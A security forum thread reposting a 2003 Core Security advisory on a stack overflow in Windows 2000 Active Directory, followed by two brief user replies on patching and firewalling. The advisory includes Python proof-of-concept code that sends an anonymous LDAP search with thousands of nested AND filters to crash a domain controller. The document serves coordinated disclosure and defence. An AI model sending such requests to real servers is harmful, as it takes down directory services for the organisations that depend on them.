Stack Overflow in Active Directory
Results 1 to 3 of 3

Thread: Stack Overflow in Active Directory

  1. #1
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883

    Stack Overflow in Active Directory

    Yep, a boundry checking condition - go figure.

    This came out on Bugtraq today.

    Core Security Technologies Advisory
    http://www.coresecurity.com

    Active Directory Stack Overflow


    Date Published: 2003-07-02

    Last Update: 2003-07-02

    Advisory ID: CORE-2003-0305-03

    Bugtraq ID: 7930

    CVE Name: None currently assigned.

    Title: Active Directory Stack Overflow

    Class: Boundary Error Condition

    Remotely Exploitable: Yes

    Locally Exploitable: Yes

    Advisory URL:
    http://www.coresecurity.com/common/s...&idxseccion=10

    Vendors contacted:
    - Microsoft
    . Core Notification: 2003-05-16
    . Notification acknowledged by Microsoft: 2003-05-19
    . Issue fixed in Windows 2000 Service Pack 4: 2003-06-26

    Release Mode: COORDINATED RELEASE


    *Vulnerability Description:*

    Active Directory, which is an essential component of the Windows 2000
    architecture, presents organizations with a directory service designed
    for distributed computing environments. Active Directory allows organizations
    to centrally manage and share information on network resources and users
    while acting as the central authority for network security.

    The directory services provided by Active Directory are based on the
    Lightweight Directory Access Protocol (LDAP) and thus Active Directory
    objects can be stored and retrieved using the LDAP protocol.

    A vulnerability in Active Directory allows an attacker to crash and force
    a reboot of any Windows 2000 Server running the Active Directory service.

    The vulnerability can be triggered when an LDAP version 3 search request
    with more than 1000 "AND" statements is sent to the server, resulting in a
    stack overflow and subsequent crash of the Lsaas.exe service.

    This in turn, will force a domain controller to stop responding, thus
    making possible a denial of service attack against it. The LDAP request
    does not need to be authenticated.

    The possibility of exploiting this vulnerability to execute arbitrary code
    on a vulnerable server has not been proved but is not discarded.


    *Vulnerable Packages:*

    Windows 2000 Server with Active Directory (Service Pack 3).


    *Solution/Vendor Information/Workaround:*

    This issue is fixed in Windows 2000 Service Pack 4, which can be
    donwloaded from:
    http://www.microsoft.com/Windows2000...vicepacks/sp4/

    Further information about the vulnerability can be obtained from
    http://support.microsoft.com/default.aspx?kbid=319709


    *Credits:*

    This vulnerability was found by Eduardo Arias, Gabriel Becedillas, Ricardo
    Quesada and Damian Saura from Core Security Technologies during Bugweek 2003
    (March 3-7, 2003).


    *Technical Description - Exploit/Concept Code:*

    A 'search request' created using LDAP version 3, constructed with more than
    1000 "AND"s, will provoke a stack overflow, making the Lsass.exe service crash
    and rebooting the machine within 30 seconds.

    To reproduce the stack overflow, you need to create a 'search request' to
    an Active Directory server. The 'search request' must search for a non existent
    machine within the Domain Controller that you've previously bind to.

    It must be composed with more than 1000 AND statements but it is supposed that
    OR, GE, LE and other binary operators will yield the same results.

    Example of a Python script that creates such a request:

    ------------------------------------
    class ActiveDirectoryDOS( Ldap ):

    def __init__(self):
    self._s = None
    self.host = '192.168.0.1'
    self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
    self.port = 389
    self.buffer = ''
    self.msg_id = 1
    Ldap.__init__()

    def generateFilter_BinaryOp( self, filter ):
    filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
    filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
    return filterBuffer

    def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
    simpleBinOp = self.generateFilter_BinaryOp( filter )
    filterBuffer = simpleBinOp
    for cnt in range( 0, numTimes ):
    filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
    return filterBuffer


    def searchSub( self, filterBuffer ):

    self.bindRequest()
    self.searchRequest( filterBuffer )

    def run(self, host = '', basedn = '', name = '' ):

    # the machine must not exist
    machine_name = 'xaxax'

    filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)

    # execute the anonymous query
    print 'executing query'
    filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
    self.searchSub( filterBuffer )

    ------------------------------------


    *About Core Security Technologies*

    Core Security Technologies develops strategic security solutions for
    Fortune 1000 corporations, government agencies and military
    organizations. The company offers information security software and
    services designed to assess risk and protect and manage information
    assets.
    Headquartered in Boston, MA, Core Security Technologies can be reached
    at 617-399-6980 or on the Web at http://www.coresecurity.com.

    To learn more about CORE IMPACT, the first comprehensive penetration
    testing framework, visit:
    http://www.coresecurity.com/products/coreimpact


    *DISCLAIMER:*

    The contents of this advisory are copyright (c) 2003 CORE Security
    Technologies and may be distributed freely provided that no fee is
    charged for this distribution and proper credit is given.

    $Id: ActiveDirectory-advisory.txt,v 1.9 2003/07/02 15:45:46 carlos Exp $
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  2. #2
    Priapistic Monk KorpDeath's Avatar
    Join Date
    Dec 2001
    Posts
    2,628
    Great you have install SP4 (which hasn't worked yet for me) to fix this issue. Here are my options 1. Don't install SP4 and keep the buggy code or 2. install SP4 and watch my system reboot and then reboot and then reboot again.... Hmmm that's a tough one.

    *me scratches the top of my head*
    Mankind have a great aversion to intellectual labor; but even supposing knowledge to be easily attainable, more people would be content to be ignorant than would take even a little trouble to acquire it.
    - Samuel Johnson

  3. #3
    Senior Member
    Join Date
    Apr 2002
    Posts
    634
    KorpDeath> As the way to attack the active directory system seems to be only throught LDAP requests, you could try to break this way of comunication. I think especially to set up or reconfigure a firewall in order to block packets with these sorts of instructions coming from exterior to your Windows 2000 server. I'm practically sur that some ways to recognise them exists.

    But, as you can easily imagine, it is not a viable situation on long term. It can only harden security around the hole since you cut only a medium (maybe not "the" medium) to transport the malicious code and since you depend entirely of your firewall. If the attacker bypass the firewall, you will be owned quickly (or at least crashed as the security advisory let us think).

    That's why I think you will have to migrate on another OS. Sorry.
    Life is boring. Play NetHack... --more--

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •